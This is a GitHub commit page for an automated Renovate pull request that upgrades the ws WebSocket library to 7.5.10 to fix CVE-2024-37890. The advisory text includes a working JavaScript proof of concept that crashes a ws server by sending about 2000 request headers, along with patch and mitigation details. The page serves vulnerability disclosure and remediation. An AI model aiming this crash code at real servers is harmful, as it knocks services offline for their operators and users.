Skip to content

Commit

Permalink
Update dependency ws to v7.5.10 [SECURITY] (#259)
Browse files Browse the repository at this point in the history 
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`7.5.7` ->
`7.5.10`](https://renovatebot.com/diffs/npm/ws/7.5.7/7.5.10) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/ws/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/7.5.7/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/7.5.7/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2024-37890](https://togithub.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q)

### Impact

A request with a number of headers exceeding
the[`server.maxHeadersCount`][] threshold could be used to crash a ws
server.

### Proof of concept

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

### Patches

The vulnerability was fixed in ws@8.17.1
(websockets/ws@e55e510)
and backported to ws@7.5.10
(websockets/ws@22c2876),
ws@6.2.3
(websockets/ws@eeb76d3),
and ws@5.2.4
(websockets/ws@4abd8f6)

### Workarounds

In vulnerable versions of ws, the issue can be mitigated in the
following ways:

1. Reduce the maximum allowed length of the request headers using the
[`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options
so that no more headers than the `server.maxHeadersCount` limit can be
sent.
2. Set `server.maxHeadersCount` to `0` so that no limit is applied.

### Credits

The vulnerability was reported by [Ryan
LaPointe](https://togithub.com/rrlapointe) in
[websockets/ws#2230.

### References

-
[websockets/ws#2230
-
[websockets/ws#2231

[`--max-http-header-size=size`]:
https://nodejs.org/api/cli.html#--max-http-header-sizesize
[`maxHeaderSize`]:
https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener
[`server.maxHeadersCount`]:
https://nodejs.org/api/http.html#servermaxheaderscount

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v7.5.10`](https://togithub.com/websockets/ws/releases/tag/7.5.10)

[Compare
Source](https://togithub.com/websockets/ws/compare/7.5.9...7.5.10)

### Bug fixes

- Backported
[`e55e510`](https://togithub.com/websockets/ws/commit/e55e5106) to the
7.x release line
([`22c2876`](https://togithub.com/websockets/ws/commit/22c28763)).

### [`v7.5.9`](https://togithub.com/websockets/ws/releases/tag/7.5.9)

[Compare
Source](https://togithub.com/websockets/ws/compare/7.5.8...7.5.9)

### Bug fixes

- Backported
[`bc8bd34`](https://togithub.com/websockets/ws/commit/bc8bd34e) to the
7.x release line
([`0435e6e`](https://togithub.com/websockets/ws/commit/0435e6e1)).

### [`v7.5.8`](https://togithub.com/websockets/ws/releases/tag/7.5.8)

[Compare
Source](https://togithub.com/websockets/ws/compare/7.5.7...7.5.8)

### Bug fixes

- Backported
[`0fdcc0a`](https://togithub.com/websockets/ws/commit/0fdcc0af) to the
7.x release line
([`2758ed3`](https://togithub.com/websockets/ws/commit/2758ed35)).
- Backported
[`d68ba9e`](https://togithub.com/websockets/ws/commit/d68ba9e1) to the
7.x release line
([`dc1781b`](https://togithub.com/websockets/ws/commit/dc1781bc)).

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View the
[repository job
log](https://developer.mend.io/github/gagoar/invoke-aws-lambda).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MTAuMSIsInVwZGF0ZWRJblZlciI6IjM3LjQzOC4wIiwidGFyZ2V0QnJhbmNoIjoibWFzdGVyIiwibGFiZWxzIjpbXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
  • Loading branch information
@renovate
renovate[bot] committed Aug 6, 2024
1 parent aeda4df commit 33668e9
Show file tree
Hide file tree
Showing 2 changed files with 8 additions and 8 deletions.
14 changes: 7 additions & 7 deletions package-lock.json
View file

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

2 changes: 1 addition & 1 deletion package.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -119,6 +119,6 @@
"tslib": "2.4.0",
"typescript": "4.6.4",
"utf-8-validate": "5.0.9",
"ws": "7.5.7"
"ws": "7.5.10"
}
}

0 comments on commit 33668e9

Please sign in to comment.